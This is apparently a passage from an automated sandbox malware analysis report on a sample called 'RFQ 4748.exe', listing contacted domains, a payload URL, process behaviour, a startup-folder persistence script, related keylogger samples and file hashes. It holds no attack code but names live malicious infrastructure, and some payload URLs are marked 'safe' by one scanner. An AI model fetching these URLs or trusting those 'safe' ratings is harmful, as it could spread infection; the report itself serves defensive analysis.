                  C:\Users\user\AppData\Roaming\Fallback.exe100%AviraHEUR/AGEN.1309900
                  C:\Users\user\AppData\Roaming\Fallback.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Fallback.exe32%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://www.oleonidas.gr0%Avira URL Cloudsafe
                  https://www.oleonidas.gr/slim/Knlpdavcfrw.vdf0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  oleonidas.gr
                  		185.78.221.73
                  		truefalse
                    		unknown
                    reallyfreegeoip.org
                    		188.114.96.3
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		193.122.6.168
                      		truefalse
                        		high
                        www.oleonidas.gr
                        		unknown
                        		unknowntrue
                          		unknown
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://www.oleonidas.gr/slim/Knlpdavcfrw.vdffalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://checkip.dyndns.org/false
                              		high
                              https://reallyfreegeoip.org/xml/173.254.250.90false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://github.com/mgravell/protobuf-netiRFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/14436606/23354RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2089151863.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/mgravell/protobuf-netJRFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://reallyfreegeoip.org/xml/173.254.250.90$InstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://stackoverflow.com/q/11564914/23354;RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		high
                                          https://stackoverflow.com/q/2152978/23354RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://checkip.dyndns.org/qRFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              http://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4496477218.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029ED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/mgravell/protobuf-netRFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgInstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://checkip.dyndns.comInstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.oleonidas.grRFQ 4748.exe, 00000000.00000002.2089151863.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.00000000032C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ 4748.exe, 00000000.00000002.2089151863.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://reallyfreegeoip.org/xml/RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            193.122.6.168
                                                            		checkip.dyndns.comUnited States
                                                            		31898ORACLE-BMC-31898USfalse
                                                            188.114.96.3
                                                            		reallyfreegeoip.orgEuropean Union
                                                            		13335CLOUDFLARENETUSfalse
                                                            185.78.221.73
                                                            		oleonidas.grGreece
                                                            		47521IPHOSTGRIpDomainGRfalse

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1551956
                                                            Start date and time:2024-11-08 11:50:20 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 54s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:8
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:RFQ 4748.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 96%
                                                            • Number of executed functions: 483
                                                            • Number of non-executed functions: 35
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target InstallUtil.exe, PID 360 because it is empty
                                                            • Execution Graph export aborted for target InstallUtil.exe, PID 3652 because it is empty
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: RFQ 4748.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            05:51:09API Interceptor46x Sleep call for process: RFQ 4748.exe modified
                                                            05:51:18API Interceptor13074180x Sleep call for process: InstallUtil.exe modified
                                                            05:51:28API Interceptor42x Sleep call for process: Fallback.exe modified
                                                            11:51:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            193.122.6.168Jeyt1T7XTm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            G72Zpzru1g.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • checkip.dyndns.org/
                                                            X7sazE1mXC.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            bsjypaJQbp.exeGet hashmaliciousMassLogger RATBrowse
                                                            • checkip.dyndns.org/
                                                            KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            188.114.96.3aesM8nmCM2.exeGet hashmaliciousUnknownBrowse
                                                            • start7345724.ru/new/net_api
                                                            RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                            • www.lnnn.fun/u5w9/
                                                            ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                            • www.rihanaroly.sbs/othk/
                                                            Aviso de pago.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                            • paste.ee/d/PAg0l
                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • filetransfer.io/data-package/8shpYIj5/download
                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • filetransfer.io/data-package/CXujY04Y/download
                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • filetransfer.io/data-package/O2nyeCCn/download
                                                            2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                            • www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
                                                            createdbestthingswithgoodnewswithgreatfriendship.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                            • paste.ee/d/PAg0l
                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • filetransfer.io/data-package/O7tfWEfj/download

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            reallyfreegeoip.orgRevised Order Copy.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.97.3
                                                            Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler 160924R0 _323282.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            Jeyt1T7XTm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            G72Zpzru1g.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.97.3
                                                            X7sazE1mXC.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            gMiPMyl5rr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            checkip.dyndns.comRevised Order Copy.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 193.122.130.0
                                                            Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.130.0
                                                            Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler 160924R0 _323282.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.8.169
                                                            PO#940834894039430849484803408.PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            Jeyt1T7XTm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.6.168
                                                            ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.8.169
                                                            PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.130.0
                                                            G72Zpzru1g.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 193.122.6.168

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ORACLE-BMC-31898USRevised Order Copy.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 193.122.130.0
                                                            Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.130.0
                                                            PO#940834894039430849484803408.PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            Jeyt1T7XTm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.6.168
                                                            ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 158.101.44.242
                                                            PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.130.0
                                                            G72Zpzru1g.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 193.122.6.168
                                                            X7sazE1mXC.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            CLOUDFLARENETUSRevised Order Copy.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.97.3
                                                            Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            BAT547477.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.92.223
                                                            Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler 160924R0 _323282.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            K05MQ5BcC8.lnkGet hashmaliciousDucktailBrowse
                                                            • 104.21.86.219
                                                            PO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 172.67.74.152
                                                            https://embeds.beehiiv.com/64a15014-2eab-4da5-b4be-84e59873fb46Get hashmaliciousUnknownBrowse
                                                            • 104.18.68.40
                                                            Digiturk.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                            • 104.21.86.219
                                                            4YgQ2xN41W.lnkGet hashmaliciousRDPWrap Tool, DucktailBrowse
                                                            • 104.21.86.219
                                                            IPHOSTGRIpDomainGRPurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 185.78.221.73
                                                            433.docx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                            • 185.78.220.138
                                                            https://ktima-edem.gr/gbzuv/?09812432Get hashmaliciousUnknownBrowse
                                                            • 93.174.123.195
                                                            https://andronikidis.gr/3nxw1/?31759481Get hashmaliciousUnknownBrowse
                                                            • 93.174.123.207
                                                            Prices_Required.exeGet hashmaliciousDarkCloudBrowse
                                                            • 185.78.220.151
                                                            pw5tgKfhDO.elfGet hashmaliciousMiraiBrowse
                                                            • 185.78.220.47
                                                            botx.arm.elfGet hashmaliciousUnknownBrowse
                                                            • 185.78.220.23
                                                            http://659jup6bicvl.zirino.com/c3VwcG9ydEBtb25vY2VyYS5jbw==Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                            • 93.174.125.176
                                                            http://659jup6bicvl.zirino.com/c3VwcG9ydEBtb25vY2VyYS5jbw==Get hashmaliciousCaptcha PhishBrowse
                                                            • 93.174.125.176
                                                            PAUL DETAIL's..exeGet hashmaliciousDarkCloudBrowse
                                                            • 185.78.220.151

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9adRevised Order Copy.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.96.3
                                                            Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler 160924R0 _323282.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Jeyt1T7XTm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                            • 188.114.96.3
                                                            vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                            • 188.114.96.3
                                                            PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            G72Zpzru1g.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.96.3
                                                            X7sazE1mXC.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            3b5074b1b5d032e5620f69f9f700ff0eRevised Order Copy.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 185.78.221.73
                                                            Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 185.78.221.73
                                                            SYE-210Payment-20000WI-JF49740-CN483-AM23938-AOR983-J74.exeGet hashmaliciousUnknownBrowse
                                                            • 185.78.221.73
                                                            K05MQ5BcC8.lnkGet hashmaliciousDucktailBrowse
                                                            • 185.78.221.73
                                                            PO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 185.78.221.73
                                                            Cracker.exeGet hashmaliciousLuca StealerBrowse
                                                            • 185.78.221.73
                                                            Cracker.exeGet hashmaliciousLuca StealerBrowse
                                                            • 185.78.221.73
                                                            eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                            • 185.78.221.73
                                                            4YgQ2xN41W.lnkGet hashmaliciousRDPWrap Tool, DucktailBrowse
                                                            • 185.78.221.73
                                                            EERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
                                                            • 185.78.221.73

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Roaming\Fallback.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ 4748.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):97280
                                                            Entropy (8bit):6.175068802964245
                                                            Encrypted:false
                                                            SSDEEP:1536:lweD62hOc0LT1v7dmsRKEn+s0MP3p/dnfkNH+zORM2k6dRQcWmyzdBdreJAXb4+i:lweD62hOc0LldmgN0MPXoMl63VypeJWI
                                                            MD5:AD61C5C16181FE8CE8FE58AB4BF3D15D
                                                            SHA1:656CCB4712CB709B217DA2341E3F6069CAEBF0FB
                                                            SHA-256:E7C828D9806CFAAA5251E8DFD14B76835A2E8F661AD392DE85C6A93059202F40
                                                            SHA-512:1C5C1F58177DAF6744B85CFABC8D5C55B6669BEE5ACB1E3D64F83695A044A617F6B9D3BF0A21824E3D8EF09EE397DD77CFB01F3066A709C6CA8300DC00167BA3
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
